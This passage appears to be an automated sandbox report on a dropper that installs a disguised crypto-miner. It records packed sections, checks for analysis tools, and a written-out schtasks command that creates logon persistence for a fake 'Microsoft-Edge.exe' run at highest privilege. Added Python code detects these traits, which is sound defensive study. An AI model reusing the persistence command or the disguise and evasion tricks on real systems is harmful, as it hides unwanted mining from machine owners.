                        Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.960000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nataabbx:EW;ijueevze:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nataabbx:EW;ijueevze:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Unpacked PE file: 1.2.axplong.exe.c20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nataabbx:EW;ijueevze:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nataabbx:EW;ijueevze:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Unpacked PE file: 2.2.axplong.exe.c20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nataabbx:EW;ijueevze:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nataabbx:EW;ijueevze:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Unpacked PE file: 6.2.axplong.exe.c20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nataabbx:EW;ijueevze:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nataabbx:EW;ijueevze:EW;.taggant:EW;
                        Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
                        Source: miner2.0.exe.82.dr | Static PE information: real checksum: 0x0 should be: 0x18d41
                        Source: axplong.exe.0.dr | Static PE information: real checksum: 0x1c94ce should be: 0x1ceea0
                        Source: svchost64.exe.85.dr | Static PE information: real checksum: 0x0 should be: 0x9e48
                        Source: services64.exe.107.dr | Static PE information: real checksum: 0x0 should be: 0x18d41
                        Source: file.exe | Static PE information: real checksum: 0x1c94ce should be: 0x1ceea0
                        Source: sihost64.exe.139.dr | Static PE information: real checksum: 0x0 should be: 0xcc5b
                        Source: file.exe | Static PE information: section name:
                        Source: file.exe | Static PE information: section name: .idata
                        Source: file.exe | Static PE information: section name:
                        Source: file.exe | Static PE information: section name: nataabbx
                        Source: file.exe | Static PE information: section name: ijueevze
                        Source: file.exe | Static PE information: section name: .taggant
                        Source: axplong.exe.0.dr | Static PE information: section name:
                        Source: axplong.exe.0.dr | Static PE information: section name: .idata
                        Source: axplong.exe.0.dr | Static PE information: section name:
                        Source: axplong.exe.0.dr | Static PE information: section name: nataabbx
                        Source: axplong.exe.0.dr | Static PE information: section name: ijueevze
                        Source: axplong.exe.0.dr | Static PE information: section name: .taggant
                        Source: loader_5879465914[1].exe.6.dr | Static PE information: section name: .xdata
                        Source: loader_5879465914[1].exe.6.dr | Static PE information: section name: /4
                        Source: loader_5879465914[1].exe.6.dr | Static PE information: section name: /19
                        Source: loader_5879465914[1].exe.6.dr | Static PE information: section name: /31
                        Source: loader_5879465914[1].exe.6.dr | Static PE information: section name: /45
                        Source: loader_5879465914[1].exe.6.dr | Static PE information: section name: /57
                        Source: loader_5879465914[1].exe.6.dr | Static PE information: section name: /70
                        Source: loader_5879465914[1].exe.6.dr | Static PE information: section name: /81
                        Source: loader_5879465914[1].exe.6.dr | Static PE information: section name: /92
                        Source: loader_5879465914.exe.6.dr | Static PE information: section name: .xdata
                        Source: loader_5879465914.exe.6.dr | Static PE information: section name: /4
                        Source: loader_5879465914.exe.6.dr | Static PE information: section name: /19
                        Source: loader_5879465914.exe.6.dr | Static PE information: section name: /31
                        Source: loader_5879465914.exe.6.dr | Static PE information: section name: /45
                        Source: loader_5879465914.exe.6.dr | Static PE information: section name: /57
                        Source: loader_5879465914.exe.6.dr | Static PE information: section name: /70
                        Source: loader_5879465914.exe.6.dr | Static PE information: section name: /81
                        Source: loader_5879465914.exe.6.dr | Static PE information: section name: /92
                        Source: Microsoft-Edge.exe.7.dr | Static PE information: section name: .xdata
                        Source: Microsoft-Edge.exe.7.dr | Static PE information: section name: /4
                        Source: Microsoft-Edge.exe.7.dr | Static PE information: section name: /19
                        Source: Microsoft-Edge.exe.7.dr | Static PE information: section name: /31
                        Source: Microsoft-Edge.exe.7.dr | Static PE information: section name: /45
                        Source: Microsoft-Edge.exe.7.dr | Static PE information: section name: /57
                        Source: Microsoft-Edge.exe.7.dr | Static PE information: section name: /70
                        Source: Microsoft-Edge.exe.7.dr | Static PE information: section name: /81
                        Source: Microsoft-Edge.exe.7.dr | Static PE information: section name: /92
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 6_2_00C3D84C push ecx; ret 6_2_00C3D85F
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe | Code function: 85_2_00007FFD9BAC00BD pushad ; iretd 85_2_00007FFD9BAC00C1
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Code function: 107_2_00007FFD9BAC01BD push E95E5098h; ret 107_2_00007FFD9BAC0259
                        Source: C:\Windows\System32\services64.exe | Code function: 114_2_00007FFD9BAD00BD pushad ; iretd 114_2_00007FFD9BAD00C1
                        Source: C:\Windows\System32\services64.exe | Code function: 122_2_00007FFD9BAA00BD pushad ; iretd 122_2_00007FFD9BAA00C1
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Code function: 139_2_00007FFD9BAA01BD push E95E5298h; ret 139_2_00007FFD9BAA0259
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe | Code function: 144_2_00007FFD9BAC01BD push E95E5098h; ret 144_2_00007FFD9BAC0259
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Code function: 149_2_00007FFD9BA901BD push E95E5398h; ret 149_2_00007FFD9BA90259
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe | Code function: 159_2_00007FFD9BAD01BD push E95E4F98h; ret 159_2_00007FFD9BAD0259
                        Source: file.exe | Static PE information: section name: entropy: 7.9826212288436125
                        Source: file.exe | Static PE information: section name: nataabbx entropy: 7.954246533814316
                        Source: axplong.exe.0.dr | Static PE information: section name: entropy: 7.9826212288436125
                        Source: axplong.exe.0.dr | Static PE information: section name: nataabbx entropy: 7.954246533814316
                        Source: miner2.0.exe.82.dr | Static PE information: section name: .text entropy: 7.899470281638457
                        Source: svchost64.exe.85.dr | Static PE information: section name: .text entropy: 7.409218062568192
                        Source: services64.exe.107.dr | Static PE information: section name: .text entropy: 7.899470281638457
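The three static checks behind the Data Obfuscation entries above (section rights, per-section entropy, and the "real checksum: 0x0 should be: ..." comparison) are straightforward to reproduce offline. The following is an added example written for this page, not Joe Sandbox code: it parses the PE headers with the standard library only, computes the optional-header CheckSum the way imagehlp's CheckSumMappedFile does, measures Shannon entropy per section, and flags sections that are writable and executable or that carry an empty or non-printable name. The PE it analyses is constructed in build_sample_pe() (a PE32+ with a normal .text, a nameless writable+executable section of random bytes, and .rsrc, CheckSum left at 0 like the dropped files above); it is not the analysed sample, and the entropy threshold of 7.5 is an assumption chosen to match the values listed above.

```python
"""Static PE triage: section rights, entropy and CheckSum.  Added example, not
Joe Sandbox code; the analysed file is constructed by build_sample_pe()."""
import math
import random
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_HDR = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER, 40 bytes
ENTROPY_ALERT = 7.5            # bits/byte; assumed threshold, packed data sits above it


def shannon_entropy(data: bytes) -> float:
    """0.0 for a constant buffer, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n, counts = len(data), [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def _checksum_offset(data: bytes) -> int:
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return e_lfanew + 4 + 20 + 64   # "PE\0\0" + COFF header + CheckSum offset in optional header


def pe_checksum(data: bytes) -> int:
    """CheckSum as CheckSumMappedFile computes it: fold all dwords into a 16-bit sum
    with carry, skipping the CheckSum field itself, then add the file length."""
    skip = _checksum_offset(data)
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == skip:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def parse_sections(data: bytes) -> list:
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    nsections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    first = e_lfanew + 4 + 20 + opt_size
    sections = []
    for i in range(nsections):
        name, _vs, _va, raw_size, raw_ptr, *_rest, flags = struct.unpack_from(SECTION_HDR, data, first + 40 * i)
        name = name.rstrip(b"\0")
        odd_name = not (name and all(0x21 <= c < 0x7F for c in name))   # empty or non-printable, as above
        rights = "".join(ch for ch, bit in (("E", IMAGE_SCN_MEM_EXECUTE), ("W", IMAGE_SCN_MEM_WRITE),
                                            ("R", IMAGE_SCN_MEM_READ)) if flags & bit)
        sections.append({"name": repr(name) if odd_name else name.decode("ascii"), "odd_name": odd_name,
                         "rights": rights, "raw_size": raw_size,
                         "entropy": round(shannon_entropy(data[raw_ptr:raw_ptr + raw_size]), 3),
                         "writable_code": bool(flags & IMAGE_SCN_MEM_EXECUTE and flags & IMAGE_SCN_MEM_WRITE)})
    return sections


def triage(data: bytes) -> dict:
    stored = struct.unpack_from("<I", data, _checksum_offset(data))[0]
    computed = pe_checksum(data)
    sections, findings = parse_sections(data), []
    if stored != computed:
        findings.append(f"real checksum: {stored:#x} should be: {computed:#x}")
    for s in sections:
        if s["odd_name"]:
            findings.append(f"section {s['name']} has an empty or non-printable name")
        if s["writable_code"]:
            findings.append(f"section {s['name']} is writable and executable ({s['rights']}): unpacking stub or self-modifying code")
        if s["entropy"] > ENTROPY_ALERT:
            findings.append(f"section {s['name']} entropy {s['entropy']}: packed or encrypted payload")
    return {"stored_checksum": stored, "computed_checksum": computed, "sections": sections, "findings": findings}


def fix_checksum(data: bytes) -> bytes:
    """Write the computed value back; the field is skipped by the sum, so triage() then agrees."""
    out = bytearray(data)
    struct.pack_into("<I", out, _checksum_offset(data), pe_checksum(data))
    return bytes(out)


def build_sample_pe(seed: int = 1) -> bytes:
    """Constructed PE32+ (not the analysed sample): .text, a nameless RWX section of random bytes, .rsrc."""
    rng = random.Random(seed)
    bodies = [(b".text", b"\x90" * 0x180 + b"\xC3" + b"\0" * 0x7F, IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE),
              (b"", bytes(rng.getrandbits(8) for _ in range(0x10000)),
               IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE),
              (b".rsrc", b"RSRC" * 0x40, IMAGE_SCN_MEM_READ)]
    file_align, sect_align = 0x200, 0x1000
    size_of_headers = -(-(0x40 + 4 + 20 + 240 + 40 * len(bodies)) // file_align) * file_align
    raw_ptr, va, sec_hdrs, payload = size_of_headers, sect_align, b"", b""
    for name, body, flags in bodies:
        raw_size = -(-len(body) // file_align) * file_align
        sec_hdrs += struct.pack(SECTION_HDR, name.ljust(8, b"\0"), len(body), va, raw_size, raw_ptr, 0, 0, 0, 0, flags)
        payload += body.ljust(raw_size, b"\0")
        raw_ptr += raw_size
        va += -(-len(body) // sect_align) * sect_align
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                                   # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x8664, len(bodies), 0, 0, 0, 240, 0x22)   # AMD64, EXECUTABLE|LARGE_ADDRESS_AWARE
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                                     # PE32+ magic
    struct.pack_into("<I", opt, 16, sect_align)                               # AddressOfEntryPoint -> .text
    struct.pack_into("<Q", opt, 24, 0x140000000)                              # ImageBase
    struct.pack_into("<II", opt, 32, sect_align, file_align)
    struct.pack_into("<II", opt, 56, va, size_of_headers)                     # SizeOfImage, SizeOfHeaders; CheckSum (64) stays 0
    struct.pack_into("<H", opt, 68, 3)                                        # IMAGE_SUBSYSTEM_WINDOWS_CUI
    struct.pack_into("<I", opt, 108, 16)                                      # NumberOfRvaAndSizes
    headers = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sec_hdrs
    return headers.ljust(size_of_headers, b"\0") + payload
```

Running triage(build_sample_pe()) yields the same three kinds of finding the report lists for file.exe and the dropped miners: a zero stored checksum with a non-zero computed one, a nameless section that is both writable and executable, and an entropy close to 8 for that section against well under 1 bit/byte for the plain .text. A checksum mismatch on its own is weak evidence (many legitimate tools never set the field), so it is useful only in combination with the section findings, which is how the report presents it.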

                        Persistence and Installation Behavior

                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Executable created and started: C:\Windows\system32\services64.exe
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Executable created and started: C:\Windows\system32\Microsoft\Libs\sihost64.exe
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | File created: C:\Windows\system32\Microsoft\Libs\WR64.sys
                        Source: C:\Windows\System32\curl.exe | File created: C:\Users\user\AppData\Local\Temp\miner2.0.exe
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | File created: C:\Windows\System32\Microsoft\Libs\sihost64.exe
                        Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe | File created: C:\Users\user\AppData\Local\Temp\svchost64.exe
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | File created: C:\Windows\System32\Microsoft\Libs\WR64.sys
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\loader_5879465914[1].exe
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | File created: C:\Windows\System32\services64.exe
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | File created: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | File created: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe

                        Boot Survival

                        Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
                        Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                        Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Window searched: window name: FilemonClass
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Window searched: window name: RegmonClass
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Window searched: window name: Regmonclass
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Window searched: window name: Filemonclass
                        Source: C:\Windows\System32\cscript.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "Microsoft Edge" /tr "C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe" /sc onlogon /rl highest /f
                        Source: C:\Users\user\Desktop\file.exe | File created: C:\Windows\Tasks\axplong.job
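The persistence entries above combine into a small set of host-level detections: a schtasks /create whose /tr target lives in a user-writable directory and whose trigger is onlogon (with /rl highest on top), executables and a driver written under C:\Windows by a process running out of %TEMP%, and a legacy .job file appearing in C:\Windows\Tasks. The following is an added example, not Joe Sandbox code, that runs those rules over constructed events modelled on the lines above plus two benign controls that must not fire; the tab-separated "source<TAB>action: detail" event format, the set of boot triggers, and the user-writable path list are assumptions made for the example.

```python
"""Persistence triage over sandbox-style events.  Added example, not Joe Sandbox
code; EVENTS and the event format are constructed for illustration."""
import re

# Constructed events: four modelled on the entries above, two benign controls.
EVENTS = """\
C:\\Windows\\System32\\cscript.exe\tProcess created: "C:\\Windows\\System32\\schtasks.exe" /create /tn "Microsoft Edge" /tr "C:\\Users\\user\\AppData\\Local\\Temp\\Microsoft-Edge.exe" /sc onlogon /rl highest /f
C:\\Users\\user\\AppData\\Local\\Temp\\svchost64.exe\tFile created: C:\\Windows\\System32\\services64.exe
C:\\Users\\user\\AppData\\Local\\Temp\\svchost64.exe\tFile created: C:\\Windows\\System32\\Microsoft\\Libs\\WR64.sys
C:\\Users\\user\\Desktop\\file.exe\tFile created: C:\\Windows\\Tasks\\axplong.job
C:\\Windows\\System32\\svchost.exe\tProcess created: "C:\\Windows\\System32\\schtasks.exe" /create /tn "Backup" /tr "C:\\Program Files\\Backup\\backup.exe" /sc daily /st 02:00
C:\\Program Files\\Installer\\setup.exe\tFile created: C:\\Program Files\\Installer\\app.dll
"""

# Assumed path classes: locations a standard user can write to, and the Windows directory.
USER_WRITABLE = re.compile(r"^[A-Za-z]:\\(Users|ProgramData|Windows\\Temp)\\", re.I)
WINDOWS_DIR = re.compile(r"^[A-Za-z]:\\Windows\\", re.I)
BOOT_TRIGGERS = {"onlogon", "onstart", "onidle"}   # schtasks /sc values that survive a reboot


def parse_schtasks(cmdline: str):
    """Return schtasks switches as a dict ({'create': True, 'tn': 'Microsoft Edge', ...}),
    or None when the command line is not schtasks.  Quoted arguments keep their spaces."""
    tokens = [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]
    if not tokens or not tokens[0].lower().endswith("schtasks.exe"):
        return None
    opts, i = {}, 1
    while i < len(tokens):
        if tokens[i].startswith("/"):
            key = tokens[i][1:].lower()
            if i + 1 < len(tokens) and not tokens[i + 1].startswith("/"):
                opts[key] = tokens[i + 1]      # switch with a value: /tn "Microsoft Edge"
                i += 2
                continue
            opts[key] = True                   # bare switch: /create, /f
        i += 1
    return opts


def triage_event(source: str, action: str, detail: str) -> list:
    findings = []
    if action == "Process created":
        opts = parse_schtasks(detail)
        if opts and "create" in opts:
            name, target = opts.get("tn", "?"), str(opts.get("tr", ""))
            trigger, level = str(opts.get("sc", "")).lower(), str(opts.get("rl", "")).lower()
            if trigger in BOOT_TRIGGERS and USER_WRITABLE.match(target):
                findings.append(f"task '{name}' runs user-writable binary {target} at {trigger}")
            if level == "highest":
                findings.append(f"task '{name}' requests /rl highest (elevated token when the account is an admin)")
    elif action == "File created":
        if WINDOWS_DIR.match(detail) and USER_WRITABLE.match(source):
            findings.append(f"temp-resident process wrote {detail} into the Windows directory")
        if detail.lower().endswith(".sys"):
            findings.append(f"kernel driver dropped: {detail}")
        elif detail.lower().endswith(".job"):
            findings.append(f"legacy Task Scheduler job created: {detail}")
    return findings


def scan(log_text: str) -> dict:
    """Map each source image to the findings its events produced; clean sources are omitted."""
    report = {}
    for line in log_text.splitlines():
        source, _, rest = line.partition("\t")
        action, _, detail = rest.partition(": ")
        for finding in triage_event(source, action, detail):
            report.setdefault(source, []).append(finding)
    return report
```

scan(EVENTS) attributes two findings to cscript.exe (logon-triggered task pointing into %TEMP%, plus /rl highest), three to the temp-resident svchost64.exe (two Windows-directory writes, one of them a driver) and two to file.exe for the .job file, while the service-host backup task and the installer writing into its own Program Files directory produce nothing. The WinRing0 driver (WR64.sys above) is what gives the miner MSR access, so a .sys written by a process in a user profile is worth its own alert even without a signature check.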

                        Hooking and other Techniques for Hiding and Protection

                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
